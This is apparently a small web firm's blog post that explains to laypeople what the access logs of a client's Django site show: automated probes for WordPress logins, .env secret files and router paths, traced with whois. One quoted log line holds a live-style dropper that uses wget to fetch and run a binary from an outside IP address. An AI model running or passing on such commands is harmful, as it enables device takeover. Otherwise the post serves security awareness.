Cybersecurity: Bringing It Home To You
We all take care to protect our homes. Where I live we make sure we lock the front door when we are not at home. And before we go to bed.
Same goes for the online world. In general. The difference being that while we have physical measures to be taken protecting our home, the measures we take against online security breaches are mostly invisible for the homeowners. The measures are hidden behind tech stuff.
So the object of this article is to bring online security home to you.
Lets take a look at the right part of the header image. What this depicts is a list of the "agents" that have tried to access the website of one of our clients. As you can see I have hidden any identifiable information. Also, note that I am not saying "people". We don't know if the access attempts are people.
The first line is this:
158.255.80.210 - - [14/Sep/2024:07:27:10 +0000] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
Let's break it down:
Let's look at point 2 first. That is the entrance to the content management system of a Wordpress website. That would only be legit for the content manager of said Wordpress website. But -- of course -- our client's website is in Django, not Wordpress. So whats up?
Point 1 then. Let's figure out where the sending agent is located.
But before we go ahead, just a word about "location". If you would want to know my location as in where I am sitting, at my home in Amsterdam, writing this article, you wouldn't be able to tell from my internet address. Instead, what you would find would be the physical address of the data centre that collects all internet traffic from a certain internet provider and sends it on its merry way. In my case, that is a data centre located near Schiphol International Airport when I am on one of my two internet providers. On the other, it is the northern city of Groningen.
Having said all that, let's go look.
There are a number of ways to find out something about location, but I tend to use a command line tool called "whois". It tends to show a little more detail than similar online tools.
I have hidden a number of details that I didn't think relevant. One is the name of the person listed. I looked him up, he is on Linkedin. Seems like a nice guy. From Georgia (the one in Europe). The other I hid is the telecom provider. A company from the UK. I looked them up as well. In a little industrial estate somewhere between Birmingham and Nottingham. Looks like a smallish company, bet they were glad to land the project. Don't know what they are still doing in Russia though.
Point is, we have an address. Again, this is not the address of our "agent" but the address of the data centre that handles the traffic for the internet address of our agent. Seeing that greater Moscow is about half the size of the Netherlands, our agent could be somewhere within that area. That's not very precise.
Nevertheless, what is "some agent in the greater Moscow area" doing accessing the website of our client? And trying to access it as if it were a Wordpress site and as it's content manager. Up to no good, no doubt. Our agent is trying our front door.
领英推荐
In fact, in that morning, from 7.30 to 9.00 AM, no less than 8 agents were trying our front door, some multiple times. Let's look:
158.255.80.210 - - [14/Sep/2024:07:27:10 +0000] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
165.232.102.155 - - [14/Sep/2024:07:29:06 +0000] "GET /wp-login.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
54.36.177.206 - - [14/Sep/2024:07:41:15 +0000] "GET / HTTP/1.1" 301 162 "https://****************/wp-login.php" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
57.129.23.166 - - [14/Sep/2024:07:49:15 +0000] "GET /.env HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
57.129.23.166 - - [14/Sep/2024:07:49:15 +0000] "POST / HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.255.160.234 - - [14/Sep/2024:08:12:39 +0000] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 146 "-" "Hello"
103.74.116.72 - - [14/Sep/2024:08:26:59 +0000] "GET /wp-login.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
194.233.79.143 - - [14/Sep/2024:08:34:36 +0000] "GET /.env HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
124.220.11.157 - - [14/Sep/2024:08:52:30 +0000] "GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.95.147.201%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20jaws%3B HTTP/1.1\x5Cr\x5CnUser-Agent: Mozila/5.0\x5Cr\x5CnHost: 127.0.0.1:80\x5Cr\x5CnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\x5Cr\x5CnConnection: keep-alive\x5Cr\x5Cn\x5Cr\x5Cn\x11" 400 150 "-" "-"
57.129.23.166 - - [14/Sep/2024:08:53:03 +0000] "GET /.env HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
57.129.23.166 - - [14/Sep/2024:08:53:03 +0000] "POST / HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
We see that some of these attempts to access our clients website look quite similar. They hit the exact same target; wp-login.php, and they carry the exact same browser signature.
158.255.80.210 - - [14/Sep/2024:07:27:10 +0000] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
165.232.102.155 - - [14/Sep/2024:07:29:06 +0000] "GET /wp-login.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
54.36.177.206 - - [14/Sep/2024:07:41:15 +0000] "GET / HTTP/1.1" 301 162 "https://****************/wp-login.php" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
103.74.116.72 - - [14/Sep/2024:08:26:59 +0000] "GET /wp-login.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
But they do not originate from the same geographical area my any means:
Hmm. Our "agent" is attacking from multiple locations. How? Well, maybe through some combination of infected PC's and servers installed specifically for this task. What this means for us right now, is that apparently we are not talking about someone sitting in some room randomly entering urls in their browser. Rather, it is a coordinated and systematic attack. Most likely automated.
But maybe "how" is less important for us right now. What is important is that our client's little website, getting maybe 10 legitimate views a day, is being attacked big time by agents all over the world. Eight in an hour and a half is more than a hundred attacks a day. That is a lot. And not only because it is a threat. We literally need to run bigger servers because the attacks outnumber the legitimate views ten to one.
Luckily the web framework we use is Django, which is inherently a lot safer than many others. And many of our clients realise how important it is to maintain a tight ship when it comes to security, so they are more than willing to invest in measures that enhance security.
But for some clients, especially the smaller ones, the importance of security is less clear. They would rather have us work on features that bring immediate returns.
Sadly though, the simple truth is that not only big companies are attacked every single day, but everyone. You and I. The little websites of our clients.
Where I live any number of people pass by my front door. I am so glad it is securely locked.
PS: I mentioned 8 agents trying to compromise our website. Here is an explanation of the requests I have not touched upon: